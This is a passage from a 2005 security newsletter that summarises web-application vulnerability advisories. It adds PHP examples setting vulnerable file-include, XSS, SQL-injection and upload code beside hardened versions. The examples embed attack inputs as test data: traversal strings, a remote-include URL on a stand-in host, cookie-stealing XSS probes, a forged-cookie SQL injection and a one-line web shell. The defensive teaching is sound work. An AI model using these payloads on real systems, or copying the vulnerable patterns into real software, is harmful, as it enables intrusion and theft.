Ref: http://www.securityfocus.com/bid/14954
______________________________________________________________________

05.39.39 CVE: Not Available
Platform: Web Application
Title: phpMyFAQ Local File Include Vulnerability
Description: phpMyFAQ is an FAQ manager web-application written in
PHP. It is reported to be vulnerable to a local file include issue due
to improper sanitization of the "LANGCODE" parameter of the "index.php"
script. phpMyFAQ version 1.5.1 is reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14929
______________________________________________________________________

05.39.40 CVE: CAN-2005-3062
Platform: Web Application
Title: AlstraSoft E-Friends Remote File Include
Description: AlstraSoft E-Friends is a web-based forum application. It
is affected by a remote file include vulnerability. An attacker could
host arbitrary malicious code in a file at an attacker-controlled site
and cause the application to include that file through a variable used
as an include path. An attacker may leverage this issue to execute
arbitrary server-side script code on an affected computer. AlstraSoft
E-Friends 4.0 is reported to be affected.
Ref: http://www.securityfocus.com/archive/1/411584
______________________________________________________________________

05.39.41 CVE: Not Available
Platform: Web Application
Title: phpMyFAQ Password.PHP SQL Injection
Description: phpMyFAQ is an FAQ manager web-application. Insufficient
sanitization of the "username" field of the "password.php" script
exposes the application to an SQL injection issue. phpMyFAQ version
1.5.1 is reported to be prone to this issue.
Ref: http://www.securityfocus.com/bid/14927
______________________________________________________________________

05.39.42 CVE: Not Available
Platform: Web Application
Title: phpMyFAQ Multiple Cross-Site Scripting Vulnerabilities
Description: phpMyFAQ is vulnerable to multiple cross-site scripting
issues due to a failure in the application to properly sanitize
user-supplied input to the "/admin/header.php" and "/admin/footer.php"
scripts. An attacker may leverage these issues to steal cookie-based
authentication credentials as well as perform other attacks. phpMyFAQ
1.5.1 is vulnerable.
Ref: http://rgod.altervista.org/phpmyfuck151.html
______________________________________________________________________

05.39.43 CVE: Not Available
Platform: Web Application
Title: Movable Type Username Information Disclosure
Description: Movable Type is a Web log publishing platform. It is
vulnerable to an information disclosure issue which could be exploited
by a remote attacker to extract username information from the
application error messages and could aid further brute force attacks.
Movable Type versions earlier than 3.2 are vulnerable.
Ref: http://www.sixapart.com/movabletype/docs/3.2/h_changelog/#entry-5869
______________________________________________________________________

05.39.44 CVE: CAN-2005-3043
Platform: Web Application
Title: Mall23 AddItem.ASP SQL Injection
Description: Mall23 is an ecommerce application written in ASP. Mall23
is prone to an SQL injection vulnerability. Successful exploitation
could result in a compromise of the application, disclosure or
modification of data, or may permit an attacker to exploit
vulnerabilities in the underlying database implementation.
Ref: http://systemsecure.org/ssforum/viewtopic.php?t=277
______________________________________________________________________

05.39.45 CVE: Not Available
Platform: Web Application
Title: Lotus Domino Unspecified Cross-Site Scripting
Description: IBM Lotus Domino is prone to a cross-site scripting
vulnerability. This is due to insufficient input validation of data
supplied through URI parameters. The specific parameter affected was
not specified by IBM. IBM Lotus Domino version 6.5.4 is reportedly
vulnerable.
Ref: http://www-1.ibm.com/support/docview.wss?rs=0&uid=swg21201845
______________________________________________________________________

05.39.46 CVE: Not Available
Platform: Web Application
Title: PunBB Forgotten Email Cross-Site Scripting
Description: PunBB is a bulletin board application. Insufficient
sanitization of user-supplied input to the "forgotten e-mail" feature
exposes the application to a cross-site scripting issue. All current
versions are affected.
Ref: http://www.securityfocus.com/bid/14912
______________________________________________________________________

05.39.47 CVE: Not Available
Platform: Web Application
Title: PunBB Language Selection File Include
Description: PunBB is a bulletin board application. It is vulnerable
to a file include issue because user-supplied input to the language
selection is not properly sanitized before it is used to build an
include path. An attacker may leverage this issue to include files
other than the intended language files and so gain unauthorized
access. PunBB versions earlier than 1.2.8 are vulnerable.
Ref: http://www.punbb.org/changelogs/1.2.7_to_1.2.8.txt
______________________________________________________________________

05.39.48 CVE: Not Available
Platform: Web Application
Title: GeSHI Example.PHP Directory Traversal
Description: GeSHI is a generic syntax highlighter application written
in PHP. It is reported to be vulnerable to a directory traversal issue
due to improper sanitization of user-supplied input to the "language"
parameter of the "contrib/example.php" script. GeSHi version 1.0.7.2
is reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14903
______________________________________________________________________
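The file include and traversal entries in this issue (05.39.28, 05.39.32, 05.39.39, 05.39.40, 05.39.47 and 05.39.48) share one root cause: a request parameter that names a file is spliced straight into an include path. The PHP below is an added example written for this bulletin, not code from any of those products. The "lang/" directory layout, the two-letter language-code format and the function names are assumptions made for the demonstration. It puts the vulnerable pattern next to a hardened resolver that allowlists the value syntactically, requires the named file to actually exist, and checks that the resolved path still sits under the intended directory.

```php
<?php
// Added example (editor's, not code from any product in this bulletin).
// Assumed layout: a "lang/" directory beside this script holding one PHP
// file per supported language, e.g. lang/en.php, lang/de.php.

// --- Vulnerable pattern: the request parameter becomes part of the path.
// "../../../../etc/passwd" (with a trailing null byte on old PHP) or
// "../../uploads/avatar.jpg" pulls in a file the author never intended;
// with allow_url_include=On a value such as "http://evil.example/x.txt?"
// turns the same line into a remote file include.
function load_language_vulnerable(string $code): void
{
    include __DIR__ . '/lang/' . $code . '.php';
}

// --- Hardened pattern.
// 1. Syntactic allowlist: only the characters a language code may contain
//    (\A and \z rather than ^ and $ so a trailing newline is not accepted).
// 2. Semantic allowlist: the code must name a file that exists in lang/.
// 3. Containment: after realpath() collapses ".." and symlinks, the file
//    must still be inside the language directory.
function resolve_language_file(string $code, string $langDir): ?string
{
    if (!preg_match('/\A[a-z]{2}(?:-[a-z]{2})?\z/', $code)) {
        return null;                    // "../x", "en\0", "http://...", "EN" fail here
    }
    $base = realpath($langDir);
    $path = realpath($langDir . '/' . $code . '.php');
    if ($base === false || $path === false) {
        return null;                    // unknown language or missing directory
    }
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                    // resolved outside lang/ (defence in depth)
    }
    return $path;
}

function load_language_hardened(string $code): void
{
    $file = resolve_language_file($code, __DIR__ . '/lang');
    if ($file === null) {
        $file = __DIR__ . '/lang/en.php'; // fixed default, never the user's value
    }
    include $file;
}

// Self-check against a throwaway directory so the script runs stand-alone.
$tmp = sys_get_temp_dir() . '/lang_' . bin2hex(random_bytes(4));
mkdir($tmp);
file_put_contents("$tmp/en.php", "<?php\n");          // constructed language file
foreach (['en', 'de', '../en', "en\0", 'http://evil.example/x', 'EN'] as $probe) {
    $r = resolve_language_file($probe, $tmp);
    printf("%-28s => %s\n", json_encode($probe), $r === null ? 'rejected' : 'ok');
}
unlink("$tmp/en.php");
rmdir($tmp);
```

Only "en" is accepted; "de" is rejected because no such file exists, and the traversal, null-byte, URL and wrong-case probes are all stopped by the regex before the filesystem is consulted. The realpath() containment check is redundant with the regex but is cheap insurance against a later change that loosens the pattern.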

05.39.49 CVE: Not Available
Platform: Web Application
Title: Copernicus Europa Multiple Unspecified SQL Injection
Vulnerabilities
Description: Copernicus Europa is an asset finance administration and
accounting system. It is vulnerable to multiple unspecified SQL
injection issues due to a failure in the application to properly
sanitize input before using it in an SQL query. Remote attackers could
exploit these issues to compromise the application, obtain sensitive
data or perform other attacks.
Ref: http://www.securityfocus.com/bid/14895/info
______________________________________________________________________

05.39.50 CVE: Not Available
Platform: Web Application
Title: PerlDiver Perldiver.CGI Cross-Site Scripting
Description: PerlDiver is an application which displays Perl
installation settings. It is reported to be vulnerable to a cross-site
scripting issue due to improper sanitization of user-supplied input to
the "module" parameter of the "perldiver.cgi" script. PerlDiver
version 2.31 is reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14894
______________________________________________________________________
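The cross-site scripting entries in this issue (05.39.27, 05.39.29, 05.39.31, 05.39.34, 05.39.36, 05.39.37, 05.39.38, 05.39.42, 05.39.45, 05.39.46 and 05.39.50) are all the same defect: a request parameter is written back into the page without encoding for the HTML context it lands in. The PHP below is an added example for this bulletin and is not code from any of those products; the page template, the "page" parameter and the probe strings are constructed for the demonstration. It shows the unencoded output beside a version that encodes per context (element text, quoted attribute, URL query string).

```php
<?php
// Added example (editor's, not code from any product in this bulletin).
// The template and the probes below are constructed for the demonstration.

// --- Vulnerable: the "page" parameter is echoed in three HTML contexts
// (element text, a "-quoted attribute, a '-quoted attribute) unencoded.
function render_vulnerable(string $page): string
{
    return "<h1>Page: $page</h1>\n"
         . "<a href=\"index.php?page=$page\" title='$page'>reload</a>\n";
}

// --- Hardened: encode for the context the value lands in.
//  * Element text and quoted attributes: htmlspecialchars() with
//    ENT_QUOTES so both " and ' are converted, an explicit charset, and
//    ENT_SUBSTITUTE so invalid byte sequences cannot make it return "".
//  * A value placed in a URL query string is percent-encoded first and
//    the resulting attribute is HTML-encoded on top.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_hardened(string $page): string
{
    $q = rawurlencode($page);
    return '<h1>Page: ' . h($page) . "</h1>\n"
         . '<a href="index.php?page=' . h($q) . '" title="' . h($page)
         . "\">reload</a>\n";
}

// True when the probe survives into the output with its markup intact,
// i.e. the page is exploitable with that payload.
function payload_survives(string $html, string $probe): bool
{
    return strpos($html, $probe) !== false;
}

// Probes of the kind thrown at a "page", "msg", "name" or "module" field.
$probes = [
    '"><script>alert(document.cookie)</script>',   // escapes a "-quoted attribute
    "' onmouseover='alert(1)",                     // escapes a '-quoted attribute
    '<img src=x onerror=alert(1)>',                // plain element-text context
];

foreach ($probes as $p) {
    printf("vulnerable: %s   hardened: %s   probe: %s\n",
        payload_survives(render_vulnerable($p), $p) ? 'EXPLOITABLE' : 'safe',
        payload_survives(render_hardened($p), $p)   ? 'EXPLOITABLE' : 'safe',
        $p);
}
```

Every probe survives intact in the vulnerable output and is neutralised in the hardened one. Note that a single encoding function is only correct because every sink here is an HTML text or quoted-attribute context; a value written into a JavaScript string, a CSS property or an unquoted attribute needs its own encoder, and no amount of output encoding substitutes for validating an "href" value that the user may set to a "javascript:" URL.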

05.39.51 CVE: CAN-2005-3076
Platform: Web Application
Title: Simplog Multiple SQL Injection Vulnerabilities
Description: Simplog is used for adding blogging capabilities to
existing websites. It is prone to multiple SQL injection
vulnerabilities due to insufficient sanitization of user-supplied
input. Simplog version 0.9.1 is affected by this issue.
Ref: http://secunia.com/advisories/16881/
______________________________________________________________________

05.39.52 CVE: CAN-2005-3045
Platform: Web Application
Title: My Little Forum Search.PHP SQL Injection
Description: My Little Forum is a simple web-forum implemented in PHP.
It is prone to an SQL injection vulnerability. Successful exploitation
could result in a compromise of the application, disclosure or
modification of data, or may permit an attacker to exploit
vulnerabilities in the underlying database implementation. Versions
1.3 and 1.5 are vulnerable.
Ref: http://www.securityfocus.com/bid/14908
______________________________________________________________________
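The SQL injection entries in this issue (05.39.30, 05.39.33, 05.39.35, 05.39.41, 05.39.44, 05.39.49, 05.39.51 and 05.39.52) differ only in where the attacker's bytes come from: a form field, a search box, or, in the SEO-Board case, a cookie the application trusts for its admin check. The PHP below is an added example for this bulletin, not code from any of those products. It assumes the pdo_sqlite extension; the users table, its rows and the forged cookie are constructed for the demonstration. It shows an admin lookup that interpolates cookie values into the statement next to the same lookup with bound parameters.

```php
<?php
// Added example (editor's, not code from SEO-Board, phpMyFAQ or any other
// product in this bulletin). Requires PDO with the sqlite driver.
$db = new PDO('sqlite::memory:', null, null,
              [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, '
        . 'pw_hash TEXT, is_admin INTEGER)');
// Constructed rows; the hashes are placeholders, not real credentials.
$db->exec("INSERT INTO users VALUES (1, 'admin', 'e3b0c442', 1), "
        . "(2, 'bob', '9f86d081', 0)");

// --- Vulnerable: cookie (or form) values are interpolated into the SQL
// text. The attacker owns the cookie, so the quoting is theirs to break.
function admin_by_cookie_vulnerable(PDO $db, string $cookieName,
                                    string $cookieHash): ?array
{
    $sql = "SELECT id, name FROM users WHERE name = '$cookieName' "
         . "AND pw_hash = '$cookieHash' AND is_admin = 1";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// --- Hardened: identical query, but the values travel as bound
// parameters and never become part of the statement text. There is no
// escaping step to get wrong (addslashes()/magic_quotes were never that).
function admin_by_cookie_hardened(PDO $db, string $cookieName,
                                  string $cookieHash): ?array
{
    $stmt = $db->prepare('SELECT id, name FROM users WHERE name = :n '
                       . 'AND pw_hash = :h AND is_admin = 1');
    $stmt->execute([':n' => $cookieName, ':h' => $cookieHash]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// A forged cookie: the "name" closes the string literal and comments out
// the password and admin checks, so no hash is needed at all.
$forgedName = "admin' OR '1'='1' -- ";
$forgedHash = 'anything';

var_dump(admin_by_cookie_vulnerable($db, $forgedName, $forgedHash)); // admin row
var_dump(admin_by_cookie_hardened($db, $forgedName, $forgedHash));   // NULL
var_dump(admin_by_cookie_hardened($db, 'admin', 'e3b0c442'));        // admin row
```

The interpolated version hands back the admin row for a cookie that contains no valid hash; the prepared version treats the whole forged string as a literal user name and finds nothing. Binding parameters fixes the injection but not the design flaw behind it: an admin decision should rest on a server-side session, not on a name and hash the client can set in a cookie.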

05.39.53 CVE: Not Available
Platform: Web Application
Title: Movable Type Remote File Include
Description: Movable Type is a web log publishing platform and it is
prone to a remote file include vulnerability. This is due to
insufficient validation of user-supplied uploaded files. As a result,
files with arbitrary extensions can be uploaded to a directory inside
the web server path. An attacker may execute arbitrary server-side
script code with the privileges of the web server process. Movable
Type version 3.17 is vulnerable.
Ref: http://www.sixapart.com/movabletype/docs/3.2/h_changelog/#entry-5869
______________________________________________________________________
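The Movable Type entry above (05.39.53) is the upload variant of the include problem: the client picks the file name and extension, and the file lands where the web server will execute it. The PHP below is an added example for this bulletin; Movable Type is written in Perl and this is not its code, but the control is the same in any language. It assumes PHP's fileinfo extension; the allowlist, the sample byte strings and the file names are constructed for the demonstration. The server decides the stored name, the extension comes from an allowlist, and the claimed type is checked against the bytes actually received.

```php
<?php
// Added example (editor's, not Movable Type code). Requires the fileinfo
// extension for content sniffing.

// Extensions the application is willing to serve, with the content type
// each one must actually contain.
const ALLOWED_EXT = ['jpg' => 'image/jpeg', 'png' => 'image/png',
                     'gif' => 'image/gif'];

// Returns the name to store the upload under, or null to reject it.
// $clientName is whatever the browser sent ($_FILES['f']['name']); it is
// attacker-controlled and is used only to read the claimed extension.
function choose_stored_name(string $clientName, string $detectedMime): ?string
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_EXT[$ext])) {
        return null;            // .php, .phtml, .htaccess, no extension at all
    }
    if (ALLOWED_EXT[$ext] !== $detectedMime) {
        return null;            // "shell.jpg" whose bytes are PHP source
    }
    // Server-generated name: no client bytes, so no double extension
    // ("shell.php.jpg"), no traversal and no overwrite of existing files.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Where the file goes matters as much as what it is called: $uploadDir
// should be outside the document root, or a directory in which the web
// server has script execution disabled, and files are served by a handler.
function stored_path(string $uploadDir, string $storedName): string
{
    return rtrim($uploadDir, '/') . '/' . $storedName;
}

// Constructed sample payloads: a JPEG header and a one-line web shell.
$jpeg = "\xFF\xD8\xFF\xE0\x00\x10JFIF\x00\x01\x01";
$php  = "<?php system(\$_GET['c']); ?>";
$finfo = new finfo(FILEINFO_MIME_TYPE);

$uploads = [
    ['photo.jpg',     $jpeg],                          // legitimate
    ['shell.php',     $php],                           // obvious
    ['shell.php.jpg', $jpeg],                          // double extension
    ['shell.jpg',     $php],                           // lies about content
    ['.htaccess',     "AddType application/x-httpd-php .jpg\n"],
];
foreach ($uploads as [$name, $bytes]) {
    $stored = choose_stored_name($name, $finfo->buffer($bytes));
    printf("%-15s => %s\n", $name,
        $stored === null ? 'rejected' : stored_path('/srv/uploads', $stored));
}
```

Only "photo.jpg" and "shell.php.jpg" are accepted, and both are stored under a random ".jpg" name, so the ".php" component of the second one never reaches the filesystem where a handler mapped by extension could pick it up. The ".htaccess" case is the reason extension allowlisting has to be the first check: accepting it would let the attacker re-map ".jpg" to the PHP handler and turn every later image upload into code.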

05.39.54 CVE: Not Available
Platform: Web Application
Title: Movable Type Multiple Unspecified HTML Injection
Vulnerabilities
Description: Movable Type is a web log publishing platform for
businesses, organizations, developers, and web designers written in
Perl. It is prone to multiple unspecified HTML injection
vulnerabilities. All current versions are affected.
Ref: http://www.securityfocus.com/bid/14912
___________________________________________________________________

(c) 2005. All rights reserved. The information contained in this
newsletter, including any external links, is provided "AS IS," with no
express or implied warranty, for informational purposes only. In some
cases, copyright for material in this newsletter may be held by a party
other than Qualys (as indicated herein) and permission to use such
material must be requested from the copyright owner.

==end==

Subscriptions: RISK is distributed free of charge to people responsible
for managing and securing information systems and networks. You may
forward this newsletter to others with such responsibility inside or
outside your organization.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (Darwin)

iD8DBQFDPIDF+LUG5KFpTkYRAuLTAJwIE4UN9R8MuNOgSRICGL7VjkPuGgCfYP/7
8uW/dTb+obOUyOK1sYoJfhA=
=GT9O
-----END PGP SIGNATURE-----